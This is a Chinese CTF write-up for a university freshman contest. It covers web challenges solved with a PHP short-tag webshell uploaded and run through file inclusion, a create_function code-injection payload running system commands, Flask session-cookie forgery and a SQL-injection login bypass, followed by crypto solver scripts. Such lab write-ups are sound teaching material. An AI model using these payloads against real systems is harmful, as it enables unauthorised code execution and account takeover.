CTF题解 - 0xgameweek2 - 《从零到一的网络安全》

web
Crypto

我们学校的新生赛第二周，记录一下web和crypto题解

比赛地址：http://0xgame.h4ck.fun/

web

一个简单的文件上传

知识点：

php短标签https://www.jianshu.com/p/5ce7020467f2

<?=，它和 <? echo 等价，从 PHP 5.4.0 起， <?= 总是可用的

源码里面有注释：可以实现任意文件读取，实际上就是文件包含，可以用伪协议读源码

？filename=php://filter/read=convert.base64-encode/resource=index.php

读到两个文件，代码审计发现，上传会检测文件内容是否含有php，最后想到可以用短标签绕过，在结合文件包含可以getshell。

<div class="light"><span class="glow">
            <form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
                嘿伙计，传个火？！
                <input class="input_file" type="file" name="upload_file"/>
                <input class="button" type="submit" name="submit" value="upload"/>
            </form>
      </span><span class="flare"></span><div>
      <!--read.php?filename=  -->
<?php
    error_reporting(0);
    //设置上传目录
    define("UPLOAD_PATH", "./uplo4d");
    $msg = "Upload Success!";
    if (isset($_POST['submit'])) {
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $file_name = $_FILES['upload_file']['name'];
        $ext = pathinfo($file_name,PATHINFO_EXTENSION);
      if(preg_match("/ph/i", strtolower($ext))){
        die("这可不能上传啊！");
    }
            $content = file_get_contents($temp_file);
            if(preg_match("/php/i", $content)){
                die("诶，被我发现了吧");
            }
        $new_file_name = md5($file_name).".".$ext;
        $img_path = UPLOAD_PATH . '/' . $new_file_name;
        if (move_uploaded_file($temp_file, $img_path)){
            $is_upload = true;
        } else {
            $msg = 'Upload Failed!';
        }
        echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
    }
?>
<?php
highlight_file(__FILE__);
error_reporting(0);
$a=$_GET["filename"];
if(preg_match('/flag/i',$a)){
  exit("nononono");
}
include($a);
?>

上传一个txt文件<?@eval($_POST['a']);?>，然后用文件包含包含这个txt文件里面的内容就可以被当作代码执行了，

访问read.php?filename=./uplo4d/4717b086fb956e9f44326d55ebdae88d.txt，蚁剑连shell即可。

getshell之后输入 env可以看到flag在环境变量里面。

find_my_secret

知识点：create_function代码注入，hash_hmac函数缺陷

https://blog.51cto.com/lovexm/1743442

hash_hmac 传入数组会返回NULL， $secret_key就可以知道了

算hash的poc

<?php
error_reporting(0);
highlight_file(__FILE__);
$secret_key='123';
if(isset($_POST['N1k0la']))
    $secret_key = hash_hmac('sha256', $_POST['N1k0la'], $secret_key);
$payload = hash_hmac('sha256', $_POST['Pupi1'], $secret_key);
echo $payload;

payload：

Poria=1857d775657b27eb33cf2ee35da75f24e414f657e4df5c7190375acfc6a76a5a&Pupi1=return 0;}system('ls');///&N1k0la[]=1&action=%5Ccreate_function

一个简单的登录

知识点：flask session 伪造，session放客户端不安全

基本和下面这题一样：

https://www.cnblogs.com/zaqzzz/p/10243961.html

payload

python3 flask_session_cookie_manager3.py encode -s 'x1ct34myydsytstflglgjhdfhsh' -t '{"name":"admin","uid":"1"}'

之后带着cookie登录即可

Come to Inject me

知识点：万能密码

又是登录框，fuzz下过滤了单引号和空格

猜测后端语句为

select * from users where username='1\' and password='or 2>1'#'

payload

username=1\&password=or(2>1)#

Crypto

Gandalf’s guidance

知识点：sha256

要输入前四位字符然后跟他后面给出的sha256加密后相等，爆破即可

from hashlib import sha256
import itertools
import string
table = string.ascii_letters + string.digits
str='fMzQooqT) == 2ddae34d81dbc95d467202472e71ebef6dd596d14e3f71e660527df13e136885'
str1=str[:8]
str2=str[13:]
for ch in itertools.permutations(table,4):
    str3=(''.join(ch)+str1).encode('utf-8')
    num=sha256(str3).hexdigest()
    if(num==str2):
        print(str3[0:4])
        break
# st='TsUHyDhB1TCU'.encode('utf-8')
# print(sha256(st).hexdigest())

Calender

日历密码,sat4就是第4个星期6，依次类推

Equation

用sagemath解方程，解出p，q，有整数解

from Crypto.Util.number import *
n = 33555689780239690694048086847389524189288012703237715867858794276743489658017980464850239941100708168649283928415140871694714440697192164543984039526678162121193938230908838178876378831172574676459081156363861361283366087345571538838706467225994325842588128149539804860896495044152933730674818252432551596974982817708277971331476855871480397156372393189419897997534292068280072732871641426633379171251157194898013855956478403138540783176666511775584047235486668960650879900176977208173201881195510367404961358949160263376947169889371038354273281722423143914248350533405861531606260664094462283837249563611971504288138304123892418723111638001706072264065302626873394656193258288717688543560330868767337762326658806600700393024919979276387184942792708152187891231733523902857737946718799312617845119104327211484432274783657354047331147403446988400451
e = 651587
c = 23477264600630970053688340552774752477190842217981107623015797247036120438813305214710501711281937473150652063672964308928306793545220522575954574964556655889566982487333956267544576156090937016331923285049450230807468560192765768325082365078576223403613336406319160948820796887606138666113585621540511413145269451447049083127221292684414571807657474625091787870860861855626067400688996234730249045275926200136048547725212856918807373343273078630793110323930960294047785441380493491675722454833129097498074282316336678633746416746091944829253030545941067128569501813304097208912240642774852688270438293329608066915561927856695878474943989398390362223553332716778293295186732609516717919500453669289295144458864364144792018620376029491566899324329551580165735150419880941044365879092297106199762747466978857130303900995168446315759690627218441548851
f = 48564566797989870076820405331566542099544017903194245271088860965232404308474242429963200201350057554149171647554710990142425928579755309710014455074463069543525852591433437970436130773216406073717410757542801816474001385465201591149608457932897528455952066271205286611405538276345368170088418954753180983764945979984579143871135231940282278896322916359051499504226157713420726523498107025853519324496713038094466752448685481484
# 3613 * p + 4805 * q==f
# n=p*q
p =5983990722180183632082197311899624822699115645080565850073684474957608698222522636486612993389961090327910302801280616857466347039059937217130561474792684705108241270391867815031566017809203079974040733954759347768465854727675144303149036934187661539205763009165004107613940636404196990043856854799380262044969041954277454092991272457299896451514697672847200058279569847114150792165971060113482025797443864013091780441159723
q =5607577173517766204809037761430426142587328424041240552502110084747255792257287855221033809829787332943690265043430618405078047185771437366185585112598772050774147113737277742919268002262592163531987843031062704055470187790657917748664097292336630034297948911361524822184468419774610706568150705174405847449838258356664870391916288148190999587304956018117495461740285505889136256275224471522062178000114122250815015549380937
fn=(p-1)*(q-1)
d=inverse(e,fn)
flag=pow(c,d,n)
flag=long_to_bytes(flag)
print(flag)

cnno1

这题有时间限制，用pwntools完成自动化

参考第一问的hint

第一问和第一题相同，第二问用中国剩余定理，解出m的3方，利用gmpy2开3方即可

from pwn import *
from hashlib import sha256
import itertools
import string
from Crypto.Util.number import *
import gmpy2
sh=remote("47.101.38.213",60712)
while(True):
    str1=sh.recvline(keepends=False)
    if(str1[4:10]==b'sha256'):
        break
str1=bytes.decode(str1)
table = string.ascii_letters + string.digits
str0=str1[16:]
str1=str0[:8]
str2=str0[13:]
for ch in itertools.permutations(table,4):
    str3=(''.join(ch)+str1).encode('utf-8')
    num=sha256(str3).hexdigest()
    if(num==str2):
        print(str3[0:4])
        break
sh.send(str3[0:4])
print("[NOTE]SENT YANZHENGMA")
n0=sh.recvline(keepends=False)
n0=bytes.decode((n0[25:]))
c0=sh.recvline(keepends=False)
c0=bytes.decode((c0[3:]))
n1=sh.recvline(keepends=False)
n1=bytes.decode((n1[3:]))
c1=sh.recvline(keepends=False)
c1=bytes.decode((c1[3:]))
n2=sh.recvline(keepends=False)
n2=bytes.decode((n2[3:]))
c2=sh.recvline(keepends=False)
c2=bytes.decode((c2[3:]))
n0=int(n0)
c0=int(c0)
n1=int(n1)
c1=int(c1)
n2=int(n2)
c2=int(c2)
M=n0*n1*n2
m0=n1*n2
m1=n2*n0
m2=n0*n1
w0=inverse(m0,n0)
w1=inverse(m1,n1)
w2=inverse(m2,n2)
f0=w0*c0*m0
f1=w1*c1*m1
f2=w2*c2*m2
flag=(f0+f1+f2)%M
# flag=pow(flag,1/3)
flag=gmpy2.iroot(flag, 3)
print((flag[0]))
mess=str.encode(str((flag[0])))
sh.send((mess))
flag1=sh.recvline(keepends=False)
print(flag1)